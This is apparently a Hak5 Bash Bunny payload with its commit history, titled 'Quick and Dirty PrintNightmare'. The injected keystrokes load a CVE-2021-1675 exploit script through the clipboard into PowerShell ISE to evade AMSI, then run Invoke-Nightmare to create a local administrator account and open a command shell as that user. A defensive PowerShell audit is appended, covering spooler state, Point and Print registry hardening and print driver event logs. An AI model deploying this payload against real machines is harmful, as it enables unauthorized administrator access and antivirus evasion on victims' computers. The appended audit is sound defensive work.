panicacid 73ca91c3ba
Quick and Dirty PrintNightmare Payload (#432)
* New Payload

Added new PrintNightmare Payload (Quick and dirty)

* Fixed my potty mouth

I'm a child sometimes

* Renamed Payload

* PrintNightmare: Use SWITCH_POSITION in payload path

* Fixing a typo

Co-authored-by: Marc <foxtrot@malloc.me>
2021-07-05 01:27:46 +01:00

# Title: Quick and Dirty PrintNightmare
# Author: PanicAcid
# Version: 1.0
#
# Leverages the following PowerShell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administrator
# As PowerShell AMSI (or whatever it's called) kept picking it up and blocking it. However if we run it via PowerShell ISE it works fine. So we're going to type out the whole
# thing!
# Huge thanks to Cribbit for the clipboard string - without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and
# Foxtrot for putting up with my nonsense.
#
# Purple.............Loading
# Green .............Execute
# Off................Finished
#
#!/bin/bash
# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no
#-----------------------------------
# Purple LED - initializing
LED SETUP
GET SWITCH_POSITION
DUCKY_LANG gb
# Attackmode HID
ATTACKMODE HID STORAGE
#-----------------------------------
# Green LED - executing the PowerShell stages (clipboard load, ISE paste, runas)
LED STAGE1
QUACK GUI r
QUACK DELAY 300
QUACK STRING powershell.exe
QUACK ENTER
QUACK DELAY 100
QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
QUACK ENTER
QUACK GUI r
QUACK DELAY 300
QUACK STRING powershell_ise.exe
QUACK ENTER
QUACK DELAY 4000
QUACK CONTROL d
QUACK CONTROL v
QUACK CONTROL d
QUACK ENTER
QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'"
QUACK ENTER
QUACK ALT F4
QUACK GUI r
QUACK DELAY 150
QUACK STRING cmd
QUACK DELAY 150
QUACK ENTER
QUACK DELAY 150
QUACK STRING runas /user:Hak5Rules cmd.exe
QUACK ENTER
QUACK DELAY 150
QUACK STRING Hak5Rules
QUACK DELAY 150
QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED FINISH
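From the defender's side, here is an added audit script (not part of the payload or the repository) that checks a Windows host for the exposure this payload relies on: the spooler state, the Point and Print hardening values from Microsoft's CVE-2021-34527 guidance, and the spooler's own operational log, where a driver install such as Invoke-Nightmare performs shows up as Event ID 316 (driver added or updated) and a failed plug-in load as 808. It assumes an elevated session and that the Microsoft-Windows-PrintService/Operational log is enabled (it is off by default).

```powershell
# Added defensive audit, not the payload's own code. Run elevated.
# Assumes the PrintService/Operational log has been enabled beforehand.
$report = [ordered]@{}

# 1. Spooler state: a stopped/disabled spooler removes the attack surface entirely.
$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$report['SpoolerStatus']    = if ($spooler) { $spooler.Status }    else { 'NotInstalled' }
$report['SpoolerStartType'] = if ($spooler) { $spooler.StartType } else { 'n/a' }

# 2. Point and Print hardening values (names from Microsoft's CVE-2021-34527 guidance).
$pp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$expected = @{
    RestrictDriverInstallationToAdministrators = 1   # only admins may add drivers
    NoWarningNoElevationOnInstall              = 0   # keep the elevation prompt
    UpdatePromptSettings                       = 0   # keep the driver update prompt
}
foreach ($name in $expected.Keys) {
    $actual = (Get-ItemProperty -Path $pp -Name $name -ErrorAction SilentlyContinue).$name
    $state = if ($null -eq $actual)              { 'Missing (OS default applies)' }
             elseif ($actual -eq $expected[$name]) { "OK ($actual)" }
             else                                  { "WEAK ($actual)" }
    $report[$name] = $state
}

# 3. Driver installs (316) and plug-in load failures (808) in the last 7 days.
$filter = @{
    LogName   = 'Microsoft-Windows-PrintService/Operational'
    Id        = 316, 808
    StartTime = (Get-Date).AddDays(-7)
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
$report['DriverEventsLast7d'] = @($events).Count

[pscustomobject]$report | Format-List
# Show the matching events so an unexpected driver name (e.g. one that never came
# from your print server) can be spotted and tied to the user session that added it.
$events | Select-Object TimeCreated, Id, Message | Format-Table -Wrap
```

A host where the spooler is running, the hardening values are missing or weak, and unexplained 316/808 events appear is one where this payload's chain would both succeed and be visible in the log.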